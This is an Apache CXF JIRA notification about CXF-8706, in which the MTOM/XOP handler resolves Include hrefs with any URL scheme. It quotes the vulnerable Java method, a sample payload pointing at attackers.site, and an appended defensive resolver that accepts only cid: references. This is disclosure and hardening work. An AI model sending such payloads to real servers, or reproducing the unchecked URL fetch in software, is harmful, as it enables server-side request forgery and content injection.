[ https://issues.apache.org/jira/browse/CXF-8706?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17649304#comment-17649304 ]

Stefan Berger commented on CXF-8706:
------------------------------------

I don't think this is limited to MTOM enabled only.

I can send MTOM requests to my server with an Endpoint where 
{{SOAPBinding.isMTOMEnabled()}} returns false.

Is it possible that {{.isMTOMEnabled() == false}} is ignored on the server 
side? Debugging breakpoints aren't triggered. Neither on startup, nor when an 
MTOM request is received.

> CXF MTOM handler allow content injection
> ----------------------------------------
>
>                 Key: CXF-8706
>                 URL: https://issues.apache.org/jira/browse/CXF-8706
>             Project: CXF
>          Issue Type: Bug
>          Components: JAXB Databinding
>    Affects Versions: 3.5.2
>            Reporter: Chunqing Lin
>            Assignee: Andriy Redko
>            Priority: Major
>             Fix For: 3.4.10, 3.5.5, 4.0.0, 3.6.0
>
>
> When used with a SOAP web service or a JAXRS web service with MTOM enabled, 
> the Unmarshaller allows the XOP Include tag to have href attributes with any 
> protocol. According to the W3C MTOM spec, only "cid:" should be allowed for 
> the href scheme.
> The affected call stack is:
>     AttachmentUtil.getAttachmentDataSource(String, Collection<Attachment>) 
> line: 554    
>     JAXBAttachmentUnmarshaller.getAttachmentAsDataHandler(String) line: 49    
>     MTOMDecorator.startElement(TagName) line: 70    
> The source code is:
> public static DataSource getAttachmentDataSource(String contentId, Collection<Attachment> atts) {
>     // Is this right? - DD
>     if (contentId.startsWith("cid:")) {
>         try {
>             contentId = URLDecoder.decode(contentId.substring(4), StandardCharsets.UTF_8.name());
>         } catch (UnsupportedEncodingException ue) {
>             contentId = contentId.substring(4);
>         }
>         return loadDataSource(contentId, atts);
>     } else if (contentId.indexOf("://") == -1) {
>         return loadDataSource(contentId, atts);
>     } else { // should only take cid for XOP
>         try {
>             return new URLDataSource(new URL(contentId));
>         } catch (MalformedURLException e) {
>             throw new Fault(e);
>         }
>     }
> }
>  
> The exploit can send a payload containing:
> <stringvalue><inc:Include href="http://attackers.site/exploit/payload" 
> xmlns:inc="http://www.w3.org/2004/08/xop/include"/></stringvalue>
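A hardened form of the href resolution described in the report, added here as an illustration and not the project's own fix: `XopHrefResolver` is a hypothetical standalone class that accepts only `cid:` hrefs, looks the decoded Content-ID up in the message's own attachment parts, and rejects every other scheme, so a non-`cid:` href is never turned into a URL fetch. Unlike the original method it also refuses bare Content-IDs without the `cid:` prefix; the attachment map is a constructed stand-in for the parsed MIME parts.

```java
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.util.Map;

/**
 * Hypothetical hardened resolver for an XOP Include href (example, not CXF code).
 * XOP requires the href to be a cid: URI naming a MIME part of the current
 * message; anything else is rejected instead of being dereferenced.
 */
public final class XopHrefResolver {

    public static byte[] resolve(String href, Map<String, byte[]> attachments) {
        // Scheme check is case-insensitive per RFC 3986, but only cid: passes.
        if (href == null || !href.regionMatches(true, 0, "cid:", 0, 4)) {
            throw new IllegalArgumentException(
                "XOP Include href must use the cid: scheme, got: " + href);
        }
        // Content-IDs are percent-encoded in the href (e.g. '@' as %40).
        String contentId = URLDecoder.decode(href.substring(4), StandardCharsets.UTF_8);

        // Look the part up by Content-ID only; never build a URL from the href.
        byte[] part = attachments.get(contentId);
        if (part == null) {
            throw new IllegalArgumentException("no attachment with Content-ID " + contentId);
        }
        return part;
    }

    public static void main(String[] args) {
        // Constructed sample attachment map standing in for the parsed MIME parts.
        Map<String, byte[]> parts = Map.of(
            "part1@example.com", "hello".getBytes(StandardCharsets.UTF_8));

        byte[] ok = resolve("cid:part1%40example.com", parts);
        System.out.println("resolved: " + new String(ok, StandardCharsets.UTF_8));

        // The href from the report and a bare Content-ID are both refused.
        for (String bad : new String[] {
                "http://attackers.site/exploit/payload", "part1@example.com"}) {
            try {
                resolve(bad, parts);
            } catch (IllegalArgumentException e) {
                System.out.println("rejected: " + e.getMessage());
            }
        }
    }
}
```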
